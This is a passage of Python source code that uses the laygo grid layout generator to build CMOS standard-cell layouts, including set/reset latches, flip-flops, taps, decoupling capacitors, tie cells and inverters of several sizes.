laygen.layers['metal'][3], xy0=np.array([0, -1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([i, 0])) ro.append(ro0) # power and groud rail 
xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # pin if create_pin == True: ren0_pin_xy = laygen.get_xy(obj = ren0, gridname = rg_m3m4) laygen.pin(name='EN', layer=laygen.layers['pin'][3], xy=ren0_pin_xy, gridname=rg_m3m4, netname='EN') ro0_pin_xy = laygen.get_xy(obj = ro[0], gridname = rg_m3m4) laygen.pin(name='VO', layer=laygen.layers['pin'][3], xy=ro0_pin_xy, gridname=rg_m3m4, netname='VO') create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_latch_2ck_strstbh(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4,origin=np.array([0, 0]), m=4, pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, route_rstm_y=5, pin_o_y=6, create_pin=False): """generate D latch (complementary clock)""" pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 # placement i0 = laygen.place("I"+objectname_pfix + 'TINV0', "tinv_"+str(m)+"x", pg, xy=origin) i2 = laygen.relplace(name = "I"+objectname_pfix + 'TGAT0', templatename = "tgate_2x", gridname = pg, refinstname = i0.name) #used minimum size i3 = laygen.relplace(name = "I"+objectname_pfix + 'ND1', templatename = "nand_2x", gridname = pg, refinstname = i2.name) #used minimum size i1 = laygen.relplace(name = "I"+objectname_pfix + 'ND0', templatename = "nand_"+str(m)+"x", gridname = pg, refinstname = i3.name) # internal pins tinv0_i_xy = laygen.get_inst_pin_xy(i0.name, 'I', rg_m3m4) tinv0_en_xy = laygen.get_inst_pin_xy(i0.name, 'EN', rg_m3m4) tinv0_enb_xy = laygen.get_inst_pin_xy(i0.name, 'ENB', rg_m3m4) tinv0_o_xy = 
laygen.get_inst_pin_xy(i0.name, 'O', rg_m3m4) nd0_a_xy = laygen.get_inst_pin_xy(i1.name, 'A', rg_m3m4) nd0_b_xy = laygen.get_inst_pin_xy(i1.name, 'B', rg_m3m4) nd0_o_xy = laygen.get_inst_pin_xy(i1.name, 'O', rg_m3m4) tgate0_i_xy = laygen.get_inst_pin_xy(i2.name, 'I', rg_m3m4) tgate0_en_xy = laygen.get_inst_pin_xy(i2.name, 'EN', rg_m3m4) tgate0_enb_xy = laygen.get_inst_pin_xy(i2.name, 'ENB', rg_m3m4) tgate0_o_xy = laygen.get_inst_pin_xy(i2.name, 'O', rg_m3m4) nd1_a_xy = laygen.get_inst_pin_xy(i3.name, 'A', rg_m3m4) nd1_b_xy = laygen.get_inst_pin_xy(i3.name, 'B', rg_m3m4) nd1_o_xy = laygen.get_inst_pin_xy(i3.name, 'O', rg_m3m4) #clk laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], tinv0_en_xy[0], tgate0_enb_xy[0], pin_clk_y, rg_m3m4) rclk0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_en_xy[0][0], pin_clk_y]), xy1=np.array([tgate0_enb_xy[0][0], pin_clk_y]), gridname0=rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], tinv0_enb_xy[0], tgate0_en_xy[0], pin_clkb_y, rg_m3m4) rclkb0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_enb_xy[0][0], pin_clkb_y]), xy1=np.array([tgate0_en_xy[0][0], pin_clkb_y]), gridname0=rg_m3m4) #storage node laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], np.array([tinv0_o_xy[0][0],route_mem_y]), np.array([tgate0_o_xy[0][0],route_mem_y]), route_mem_y, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], np.array([tgate0_o_xy[0][0],route_mem_y]), np.array([nd0_a_xy[0][0],route_mem_y]), route_mem_y, rg_m3m4) #resetm node laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], np.array([nd1_o_xy[0][0],route_rstm_y]), np.array([tgate0_i_xy[0][0],route_rstm_y]), route_rstm_y, rg_m3m4) #nd0 output to nd1 input laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], np.array([nd0_o_xy[0][0],pin_o_y]), np.array([nd1_a_xy[0][0],pin_o_y]), pin_o_y, rg_m3m4) ro0=laygen.route(None, 
laygen.layers['metal'][4], xy0=np.array([nd0_o_xy[0][0], pin_o_y]), xy1=np.array([nd1_a_xy[0][0], pin_o_y]), gridname0=rg_m3m4) #pin if create_pin == True: ri0_pin_xy=laygen.get_inst_pin_xy(name="I" + objectname_pfix + 'TINV0', pinname='I', gridname=rg_m3m4) laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ri0_pin_xy, gridname=rg_m3m4) laygen.pin(name='CLK', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = rclk0, gridname = rg_m3m4), gridname=rg_m3m4) laygen.pin(name='CLKB', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = rclkb0, gridname = rg_m3m4), gridname=rg_m3m4) laygen.pin(name='STB', layer=laygen.layers['pin'][3], xy=nd0_b_xy, gridname=rg_m3m4) laygen.pin(name='RSTB', layer=laygen.layers['pin'][3], xy=nd1_b_xy, gridname=rg_m3m4) laygen.pin(name='O', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = ro0, gridname = rg_m3m4), gridname=rg_m3m4) #power pin rvdd0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'TINV0', 'VDD', rg_m2m3) rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'ND0', 'VDD', rg_m2m3) rvss0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'TINV0', 'VSS', rg_m2m3) rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'ND0', 'VSS', rg_m2m3) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2) def generate_dff_strsth(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=np.array([0, 0]), m=4, create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 # placement i8 = laygen.place("I" + objectname_pfix + 'INV8', "inv_" + str(m) + "x", pg, xy=origin) i9 = laygen.relplace(name = "I" + objectname_pfix + 'INV9', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i8.name) i10= 
laygen.relplace(name = "I" + objectname_pfix + 'INV10', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i9.name) #stb i11= laygen.relplace(name = "I" + objectname_pfix + 'INV11', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i10.name) #rstb org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'INV11'), gridname = pg)+ laygen.get_xy(obj = i10.template, gridname = pg) * np.array([1, 0]) generate_latch_2ck_strstbh(laygen, objectname_pfix+'LCH0', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, route_rstm_y = 8, pin_o_y=5, create_pin=False) ##These two lines use different position for clk and clkb org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'LCH0ND0'), gridname = pg)+ \ laygen.get_xy(obj = laygen.get_inst('I' + objectname_pfix + 'LCH0ND0').template, gridname = pg) * np.array([1, 0]) generate_latch_2ck_strstbh(laygen, objectname_pfix+'LCH1', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=2, pin_clkb_y=3, route_mem_y=4, route_rstm_y = 8, pin_o_y=5, create_pin=False) #inverter coordinates i8_i_xy = laygen.get_inst_pin_xy(i8.name, 'I', rg_m3m4) i8_o_xy = laygen.get_inst_pin_xy(i8.name, 'O', rg_m3m4) i9_i_xy = laygen.get_inst_pin_xy(i9.name, 'I', rg_m3m4) i9_o_xy = laygen.get_inst_pin_xy(i9.name, 'O', rg_m3m4) i10_i_xy = laygen.get_inst_pin_xy(i10.name, 'I', rg_m3m4) i10_o_xy = laygen.get_inst_pin_xy(i10.name, 'O', rg_m3m4) i11_i_xy = laygen.get_inst_pin_xy(i11.name, 'I', rg_m3m4) i11_o_xy = laygen.get_inst_pin_xy(i11.name, 'O', rg_m3m4) #Latch coordinate ilch0_i_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0TINV0', 'I', rg_m3m4) ilch0_ck_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0TINV0', 'EN', rg_m3m4) ilch0_ckb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0TINV0', 'ENB', rg_m3m4) ilch0_stb_xy = 
laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND0', 'B', rg_m3m4) #set pin of latch 0 ilch0_rstb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND1', 'B', rg_m3m4) #reset pin of latch 0 ilch0_o_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND0', 'O', rg_m3m4) ilch1_i_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1TINV0', 'I', rg_m3m4) ilch1_ck_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1TINV0', 'EN', rg_m3m4) ilch1_ckb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1TINV0', 'ENB', rg_m3m4) ilch1_stb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND0', 'B', rg_m3m4) #set pin of latch 0 ilch1_rstb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND1', 'B', rg_m3m4) #reset pin of latch 1 ilch1_o_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND0', 'O', rg_m3m4) # iclkb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i8_o_xy[0], i9_i_xy[0], 3, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i9_i_xy[0], ilch1_ckb_xy[0], 3, rg_m3m4) # iclk laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i9_o_xy[0], ilch1_ck_xy[0], 2, rg_m3m4) # intermediate laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ilch0_o_xy[0], ilch1_i_xy[0], 5, rg_m3m4) # stb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i10_o_xy[0], ilch0_stb_xy[0], 6, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i10_o_xy[0], ilch1_stb_xy[0], 6, rg_m3m4) # rstb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i11_o_xy[0], ilch0_rstb_xy[0], 7, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i11_o_xy[0], ilch1_rstb_xy[0], 7, rg_m3m4) #pin if create_pin == True: laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ilch0_i_xy, gridname=rg_m3m4) laygen.pin(name='CLK', layer=laygen.layers['pin'][3], xy=i8_i_xy, gridname=rg_m3m4) 
laygen.pin(name='ST', layer=laygen.layers['pin'][3], xy=i10_i_xy, gridname=rg_m3m4) laygen.pin(name='RST', layer=laygen.layers['pin'][3], xy=i11_i_xy, gridname=rg_m3m4) laygen.pin(name='O', layer=laygen.layers['pin'][3], xy=ilch1_o_xy, gridname=rg_m3m4) #power pin rvdd0_pin_xy = laygen.get_inst_pin_xy(i8.name, 'VDD', rg_m1m2) rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1ND0', 'VDD', rg_m1m2) #(fix this) rvss0_pin_xy = laygen.get_inst_pin_xy(i8.name, 'VSS', rg_m1m2) rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1ND0', 'VSS', rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2) def generate_dff_strsth_ckb(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=np.array([0, 0]), m=4, create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 # placement i12 = laygen.place("I" + objectname_pfix + 'INV12', "inv_" + str(m) + "x", pg, xy=origin) i8 = laygen.relplace(name = "I" + objectname_pfix + 'INV8', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i12.name) #clk buffers -- try to make sure the number is same with schematic i9 = laygen.relplace(name = "I" + objectname_pfix + 'INV9', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i8.name) #that is why it's not start from '0' i10= laygen.relplace(name = "I" + objectname_pfix + 'INV10', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i9.name) #stb i11= laygen.relplace(name = "I" + objectname_pfix + 'INV11', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i10.name) #rstb org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'INV11'), gridname = pg)+ laygen.get_xy(obj = i10.template, 
gridname = pg) * np.array([1, 0]) generate_latch_2ck_strstbh(laygen, objectname_pfix+'LCH0', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, #Can we return the object of it as before? -- Zhongkai origin=org, m=m, pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, route_rstm_y = 8, pin_o_y=5, create_pin=False) ##These two lines use different position for clk and clkb org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'LCH0ND0'), gridname = pg)+ \ laygen.get_xy(obj = laygen.get_inst('I' + objectname_pfix + 'LCH0ND0').template, gridname = pg) * np.array([1, 0]) generate_latch_2ck_strstbh(laygen, objectname_pfix+'LCH1', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=2, pin_clkb_y=3, route_mem_y=4, route_rstm_y = 8, pin_o_y=5, create_pin=False) #inverter coordinates i12_i_xy = laygen.get_inst_pin_xy(i12.name, 'I', rg_m3m4) i12_o_xy = laygen.get_inst_pin_xy(i12.name, 'O', rg_m3m4) i8_i_xy = laygen.get_inst_pin_xy(i8.name, 'I', rg_m3m4) i8_o_xy = laygen.get_inst_pin_xy(i8.name, 'O', rg_m3m4) i9_i_xy = laygen.get_inst_pin_xy(i9.name, 'I', rg_m3m4) i9_o_xy = laygen.get_inst_pin_xy(i9.name, 'O', rg_m3m4) i10_i_xy = laygen.get_inst_pin_xy(i10.name, 'I', rg_m3m4) i10_o_xy = laygen.get_inst_pin_xy(i10.name, 'O', rg_m3m4) i11_i_xy = laygen.get_inst_pin_xy(i11.name, 'I', rg_m3m4) i11_o_xy = laygen.get_inst_pin_xy(i11.name, 'O', rg_m3m4) #Latch coordinate ilch0_i_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0TINV0', 'I', rg_m3m4) ilch0_ck_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0TINV0', 'EN', rg_m3m4) ilch0_ckb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0TINV0', 'ENB', rg_m3m4) ilch0_stb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND0', 'B', rg_m3m4) #set pin of latch 0 ilch0_rstb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND1', 'B', rg_m3m4) #reset pin of latch 0 ilch0_o_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 
'LCH0ND0', 'O', rg_m3m4) ilch1_i_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1TINV0', 'I', rg_m3m4) ilch1_ck_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1TINV0', 'EN', rg_m3m4) ilch1_ckb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1TINV0', 'ENB', rg_m3m4) ilch1_stb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND0', 'B', rg_m3m4) #set pin of latch 0 ilch1_rstb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND1', 'B', rg_m3m4) #reset pin of latch 1 ilch1_o_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND0', 'O', rg_m3m4) #clk laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i12_o_xy[0], i8_i_xy[0], 5, rg_m3m4) # iclkb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i8_o_xy[0], i9_i_xy[0], 3, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i9_i_xy[0], ilch1_ckb_xy[0], 3, rg_m3m4) # iclk laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i9_o_xy[0], ilch1_ck_xy[0], 2, rg_m3m4) # intermediate laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ilch0_o_xy[0], ilch1_i_xy[0], 5, rg_m3m4) # stb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i10_o_xy[0], ilch0_stb_xy[0], 6, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i10_o_xy[0], ilch1_stb_xy[0], 6, rg_m3m4) # rstb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i11_o_xy[0], ilch0_rstb_xy[0], 7, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i11_o_xy[0], ilch1_rstb_xy[0], 7, rg_m3m4) #pin if create_pin == True: laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ilch0_i_xy, gridname=rg_m3m4) laygen.pin(name='CLKB', layer=laygen.layers['pin'][3], xy=i12_i_xy, gridname=rg_m3m4) laygen.pin(name='ST', layer=laygen.layers['pin'][3], xy=i10_i_xy, gridname=rg_m3m4) laygen.pin(name='RST', layer=laygen.layers['pin'][3], xy=i11_i_xy, 
gridname=rg_m3m4) laygen.pin(name='O', layer=laygen.layers['pin'][3], xy=ilch1_o_xy, gridname=rg_m3m4) #power pin rvdd0_pin_xy = laygen.get_inst_pin_xy(i12.name, 'VDD', rg_m1m2) rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1ND0', 'VDD', rg_m1m2) #(fix this) rvss0_pin_xy = laygen.get_inst_pin_xy(i12.name, 'VSS', rg_m1m2) rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1ND0', 'VSS', rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2) if __name__ == '__main__': laygen = laygo.GridLayoutGenerator(config_file="laygo_config.yaml") import imp try: imp.find_module('bag') laygen.use_phantom = False except ImportError: laygen.use_phantom = True tech=laygen.tech utemplib = tech+'_microtemplates_dense' laygen.load_template(filename=tech+'_microtemplates_dense_templates.yaml', libname=utemplib) laygen.load_grid(filename=tech+'_microtemplates_dense_grids.yaml', libname=utemplib) laygen.templates.sel_library(utemplib) laygen.grids.sel_library(utemplib) #laygen.templates.display() #laygen.grids.display() #library generation workinglib = tech+'_logic_templates' laygen.add_library(workinglib) laygen.sel_library(workinglib) if os.path.exists(workinglib+'.yaml'): #generated layout file exists laygen.load_template(filename=workinglib+'.yaml', libname=workinglib) laygen.templates.sel_library(utemplib) #grid pg = 'placement_basic' #placement grid rg_m1m2 = 'route_M1_M2_cmos' rg_m2m3 = 'route_M2_M3_cmos' rg_m3m4 = 'route_M3_M4_basic' rg_m1m2_pin = 'route_M1_M2_basic' rg_m2m3_pin = 'route_M2_M3_basic' # cell generation laygen.add_cell('space_1x') laygen.sel_cell('space_1x') generate_space_1x(laygen, objectname_pfix='SPACE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('space_2x') 
laygen.sel_cell('space_2x') generate_space_2x(laygen, objectname_pfix='SPACE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('space_4x') laygen.sel_cell('space_4x') generate_space_4x(laygen, objectname_pfix='SPACE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('space_wovdd_1x') laygen.sel_cell('space_wovdd_1x') generate_space_wovdd_1x(laygen, objectname_pfix='SPACE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('space_wovdd_2x') laygen.sel_cell('space_wovdd_2x') generate_space_wovdd_2x(laygen, objectname_pfix='SPACE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('space_wovdd_4x') laygen.sel_cell('space_wovdd_4x') generate_space_wovdd_4x(laygen, objectname_pfix='SPACE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('tap') laygen.sel_cell('tap') generate_tap(laygen, objectname_pfix='TAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_tap='nmos4_fast_tap', devname_pmos_tap='pmos4_fast_tap', origin=np.array([0, 0]), create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tap_float') laygen.sel_cell('tap_float') generate_tap_float(laygen, objectname_pfix='TAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_tap='nmos4_fast_tap', devname_pmos_tap='pmos4_fast_tap', origin=np.array([0, 0]), create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tap_float_pmos_vss') laygen.sel_cell('tap_float_pmos_vss') generate_tap_float_pmos_vss(laygen, objectname_pfix='TAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_tap='nmos4_fast_tap', devname_pmos_tap='pmos4_fast_tap', origin=np.array([0, 0]), create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tap_pmos_vss') 
# --- taps, caps, ties, inverters, transmission gates, nmos switches --------
# Each group follows the add_cell -> sel_cell -> generate -> register recipe;
# groups differing only in multiplicity m are rolled into loops.

# tap_pmos_vss was added by the preceding code; only select it here.
laygen.sel_cell('tap_pmos_vss')
generate_tap_pmos_vss(laygen, objectname_pfix='TAP0', placement_grid=pg,
                      routing_grid_m1m2=rg_m1m2,
                      devname_nmos_tap='nmos4_fast_tap',
                      devname_pmos_tap='pmos4_fast_tap',
                      origin=np.array([0, 0]), create_pin=True)
laygen.add_template_from_cell()

# tap_wovdd takes only the nmos tap device (no pmos tap argument).
laygen.add_cell('tap_wovdd')
laygen.sel_cell('tap_wovdd')
generate_tap_wovdd(laygen, objectname_pfix='TAP0', placement_grid=pg,
                   routing_grid_m1m2=rg_m1m2,
                   devname_nmos_tap='nmos4_fast_tap',
                   origin=np.array([0, 0]), create_pin=True)
laygen.add_template_from_cell()

# bcap: pmos side uses space devices.
for _m in (4, 8):
    _cell = 'bcap_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    generate_bcap(laygen, objectname_pfix='DCAP0', placement_grid=pg,
                  routing_grid_m1m2=rg_m1m2,
                  devname_nmos_boundary='nmos4_fast_boundary',
                  devname_nmos_body='nmos4_fast_center_nf2',
                  devname_pmos_boundary='pmos4_fast_boundary',
                  devname_pmos_space='pmos4_fast_space',
                  m=_m, origin=np.array([0, 0]), create_pin=True)
    laygen.add_template_from_cell()

# bcap2: both nmos and pmos body devices are supplied.
laygen.add_cell('bcap2_8x')
laygen.sel_cell('bcap2_8x')
generate_bcap2(laygen, objectname_pfix='BCAP0', placement_grid=pg,
               routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
               devname_nmos_boundary='nmos4_fast_boundary',
               devname_nmos_body='nmos4_fast_center_nf2',
               devname_pmos_boundary='pmos4_fast_boundary',
               devname_pmos_body='pmos4_fast_center_nf2',
               m=8, origin=np.array([0, 0]), create_pin=True)
laygen.add_template_from_cell()

# dcap: pmos side uses dummy devices.
for _m in (2, 4, 8):
    _cell = 'dcap_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    generate_dcap(laygen, objectname_pfix='DCAP0', placement_grid=pg,
                  routing_grid_m1m2=rg_m1m2,
                  devname_nmos_boundary='nmos4_fast_boundary',
                  devname_nmos_body='nmos4_fast_center_nf2',
                  devname_pmos_boundary='pmos4_fast_boundary',
                  devname_pmos_space='pmos4_fast_dmy_nf2',
                  m=_m, origin=np.array([0, 0]), create_pin=True)
    laygen.add_template_from_cell()

# dcap2: both nmos and pmos body devices.
for _m in (4, 8):
    _cell = 'dcap2_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    generate_dcap2(laygen, objectname_pfix='DCAP0', placement_grid=pg,
                   routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                   devname_nmos_boundary='nmos4_fast_boundary',
                   devname_nmos_body='nmos4_fast_center_nf2',
                   devname_pmos_boundary='pmos4_fast_boundary',
                   devname_pmos_body='pmos4_fast_center_nf2',
                   m=_m, origin=np.array([0, 0]), create_pin=True)
    laygen.add_template_from_cell()

laygen.add_cell('dcap3_8x')
laygen.sel_cell('dcap3_8x')
generate_dcap3(laygen, objectname_pfix='DCAP0', placement_grid=pg,
               routing_grid_m1m2=rg_m1m2,
               devname_nmos_boundary='nmos4_fast_boundary',
               devname_nmos_body='nmos4_fast_center_nf2',
               devname_pmos_boundary='pmos4_fast_boundary',
               devname_pmos_space='pmos4_fast_dmy_nf2',
               m=8, origin=np.array([0, 0]), create_pin=True)
laygen.add_template_from_cell()

# Tie cells.
laygen.add_cell('tie_2x')
laygen.sel_cell('tie_2x')
generate_tie(laygen, objectname_pfix='TIE0', placement_grid=pg,
             routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
             routing_grid_m1m2_pin=rg_m1m2_pin,
             routing_grid_m2m3_pin=rg_m2m3_pin,
             devname_nmos_boundary='nmos4_fast_boundary',
             devname_nmos_body='nmos4_fast_center_nf2',
             devname_pmos_boundary='pmos4_fast_boundary',
             devname_pmos_body='pmos4_fast_center_nf2',
             m=2, create_pin=True)
laygen.add_template_from_cell()

laygen.add_cell('tie_wovdd_2x')
laygen.sel_cell('tie_wovdd_2x')
generate_tie_wovdd(laygen, objectname_pfix='TIE0', placement_grid=pg,
                   routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                   routing_grid_m1m2_pin=rg_m1m2_pin,
                   routing_grid_m2m3_pin=rg_m2m3_pin,
                   devname_nmos_boundary='nmos4_fast_boundary',
                   devname_nmos_body='nmos4_fast_center_nf2',
                   m=2, create_pin=True)
laygen.add_template_from_cell()

# inv_1x is built from the single-finger (nf1) devices.
laygen.add_cell('inv_1x')
laygen.sel_cell('inv_1x')
generate_inv_1x(laygen, objectname_pfix='INV0', placement_grid=pg,
                routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                routing_grid_m1m2_pin=rg_m1m2_pin,
                routing_grid_m2m3_pin=rg_m2m3_pin,
                devname_nmos_boundary='nmos4_fast_boundary',
                devname_nmos_body='nmos4_fast_center_nf1_left',
                devname_nmos_space='nmos4_fast_space',
                devname_pmos_boundary='pmos4_fast_boundary',
                devname_pmos_body='pmos4_fast_center_nf1_left',
                devname_pmos_space='pmos4_fast_space',
                create_pin=True)
laygen.add_template_from_cell()

# Larger inverters share one parameter set; only m varies.
for _m in (2, 4, 6, 8, 10, 16, 24, 32):
    _cell = 'inv_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    generate_inv(laygen, objectname_pfix='INV0', placement_grid=pg,
                 routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                 routing_grid_m1m2_pin=rg_m1m2_pin,
                 routing_grid_m2m3_pin=rg_m2m3_pin,
                 devname_nmos_boundary='nmos4_fast_boundary',
                 devname_nmos_body='nmos4_fast_center_nf2',
                 devname_pmos_boundary='pmos4_fast_boundary',
